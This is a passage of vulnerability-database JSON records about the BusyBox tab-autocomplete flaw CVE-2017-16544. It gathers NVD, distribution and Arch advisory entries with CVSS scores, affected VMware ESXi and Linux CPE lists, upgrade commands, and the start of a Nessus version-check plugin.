"cpe:2.3:o:altus:nexto_nx5101_firmware:1.8.11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-20T20:33:15", "description": "In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary file writes, or other attacks.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-20T15:29:00", "type": "cve", "title": "CVE-2017-16544", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544"], "modified": "2022-06-20T19:15:00", "cpe": ["cpe:/o:vmware:esxi:6.7", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:busybox:busybox:1.27.2", "cpe:/o:redlion:n-tron_702m12-w_firmware:*", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:vmware:esxi:6.0", "cpe:/o:vmware:esxi:6.5", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:redlion:n-tron_702-w_firmware:*"], "id": "CVE-2017-16544", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16544", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:vmware:esxi:6.7:670-201810211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201810002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201608101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201608404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:3:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201601404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201611402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201701001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201811002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201704001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201811401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904001:*:*:*:*:*:*", "cpe:2.3:o:redlion:n-tron_702-w_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810230:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201901001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507401:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201810001:*:*:*:*:*:*", "cpe:2.3:a:busybox:busybox:1.27.2:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201703002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810231:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201706103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201602401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201710301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:2:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:1:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201504401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507406:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201601102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707203:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201806001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201608405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201611401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201601101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201510401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201703401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201806001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810208:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201909001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201807001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201710001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201808001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201505401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201808001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201601403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201605401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810233:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810232:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201905001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201611403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201905001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201601405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509208:*:*:*:*:*:*", "cpe:2.3:o:redlion:n-tron_702m12-w_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201706401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201706402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:1a:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201608403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507407:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201601401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201610410:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810234:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201706403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201712001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201706101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201706102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201803001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201509206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201703001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201603203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201608401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201811301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:1b:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:3a:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201608402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201507102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201702210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201601402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:600-201511401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-201707218:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2022-01-31T11:52:37", "description": "In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2,\nthe tab autocomplete feature of the shell, used to get a list of filenames\nin a directory, does not sanitize filenames and results in executing any\nescape sequence in the terminal. This could potentially result in code\nexecution, arbitrary file writes, or other attacks.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-20T00:00:00", "type": "ubuntucve", "title": "CVE-2017-16544", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544"], "modified": "2017-11-20T00:00:00", "id": "UB:CVE-2017-16544", "href": "https://ubuntu.com/security/CVE-2017-16544", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:05", "description": "Arch Linux Security Advisory ASA-201803-1\n=========================================\n\nSeverity: High\nDate : 2018-03-01\nCVE-ID : CVE-2017-16544\nPackage : busybox\nType : arbitrary code execution\nRemote : No\nLink : https://security.archlinux.org/AVG-512\n\nSummary\n=======\n\nThe package busybox before version 1.28.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 1.28.1-1.\n\n# pacman -Syu \"busybox>=1.28.1-1\"\n\nThe problem has been fixed upstream in version 1.28.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIn the add_match function in libbb/lineedit.c in BusyBox through\n1.27.2, the tab autocomplete feature of the shell, used to get a list\nof filenames in a directory, does not sanitize filenames and results in\nexecuting any escape sequence in the terminal. This could potentially\nresult in code execution, arbitrary file writes, or other attacks.\n\nImpact\n======\n\nAn attacker is able to execute arbitrary code by tricking the user into\nauto-completing a crafted filename.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56391\nhttps://git.busybox.net/busybox/commit/?id=c3797d40a1c57352192c6106cc0f435e7d9c11e8\nhttps://www.twistlock.com/2017/11/20/cve-2017-16544-busybox-autocompletion-vulnerability/\nhttps://security.archlinux.org/CVE-2017-16544", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-03-01T00:00:00", "type": "archlinux", "title": "[ASA-201803-1] busybox: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544"], "modified": "2018-03-01T00:00:00", "id": "ASA-201803-1", "href": "https://security.archlinux.org/ASA-201803-1", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:34:04", "description": "Arch Linux Security Advisory ASA-201803-2\n=========================================\n\nSeverity: High\nDate : 2018-03-01\nCVE-ID : CVE-2017-16544\nPackage : mkinitcpio-busybox\nType : arbitrary code execution\nRemote : No\nLink : https://security.archlinux.org/AVG-514\n\nSummary\n=======\n\nThe package mkinitcpio-busybox before version 1.28.1-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 1.28.1-1.\n\n# pacman -Syu \"mkinitcpio-busybox>=1.28.1-1\"\n\nThe problem has been fixed upstream in version 1.28.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIn the add_match function in libbb/lineedit.c in BusyBox through\n1.27.2, the tab autocomplete feature of the shell, used to get a list\nof filenames in a directory, does not sanitize filenames and results in\nexecuting any escape sequence in the terminal. This could potentially\nresult in code execution, arbitrary file writes, or other attacks.\n\nImpact\n======\n\nAn attacker is able to execute arbitrary code by tricking the user into\nauto-completing a crafted filename.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56391\nhttps://git.busybox.net/busybox/commit/?id=c3797d40a1c57352192c6106cc0f435e7d9c11e8\nhttps://www.twistlock.com/2017/11/20/cve-2017-16544-busybox-autocompletion-vulnerability/\nhttps://security.archlinux.org/CVE-2017-16544", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-03-01T00:00:00", "type": "archlinux", "title": "[ASA-201803-2] mkinitcpio-busybox: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544"], "modified": "2018-03-01T00:00:00", "id": "ASA-201803-2", "href": "https://security.archlinux.org/ASA-201803-2", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-06-12T05:58:20", "description": "In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary file writes, or other attacks.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-20T15:29:00", "type": "debiancve", "title": "CVE-2017-16544", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544"], "modified": "2017-11-20T15:29:00", "id": "DEBIANCVE:CVE-2017-16544", "href": "https://security-tracker.debian.org/tracker/CVE-2017-16544", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2022-06-08T05:21:13", "description": "It was found that the tab auto-completion feature of BusyBox did not sanitize filenames, leading to execution of arbitrary escape sequences in the terminal emulator. Exploitation of this flaw by an attacker could potentially result in code execution, arbitrary file writes, or other attacks under highly specific circumstances dependent on the usage of a vulnerable terminal emulator by the user.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-21T09:50:16", "type": "redhatcve", "title": "CVE-2017-16544", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544"], "modified": "2022-06-08T03:56:12", "id": "RH:CVE-2017-16544", "href": "https://access.redhat.com/security/cve/cve-2017-16544", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:19:30", "description": "The remote VMware ESXi host is version 6.0, 6.5 or 6.7 and is affected the following vulnerabilities:\n\n - A remote code execution vulnerability caused by a failure to sanitize filenames in the tab autocomplete feature of BusyBox. This allows an attacker to execute arbitrary code, write arbitrary files, or conduct other attacks. (CVE-2017-16544)\n\n - An information disclosure vulnerability caused by insufficient session expiration. This allows an attacker with physical access or the ability to mimic a websocket connection to a user's browser to control a VM console after the user's session has expired or they have logged out. (CVE-2019-5531)\n\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-10-02T00:00:00", "type": "nessus", "title": "ESXi 6.0 / 6.5 / 6.7 Multiple Vulnerabilities (VMSA-2019-0013)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16544", "CVE-2019-5531"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:vmware:esxi"], "id": "VMWARE_ESXI_VMSA-2019-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/129493", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129493);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/02\");\n\n script_cve_id(\"CVE-2017-16544\", \"CVE-2019-5531\");\n script_bugtraq_id(93287);\n script_xref(name:\"VMSA\", value:\"2019-0013\");\n script_xref(name:\"IAVA\", value:\"2019-A-0344\");\n\n script_name(english:\"ESXi 6.0 / 6.5 / 6.7 Multiple Vulnerabilities (VMSA-2019-0013)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi host is missing a security patch and is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 6.0, 6.5 or 6.7 and is affected the following vulnerabilities:\n\n - A remote code execution vulnerability caused by\n a failure to sanitize filenames in the tab autocomplete\n feature of 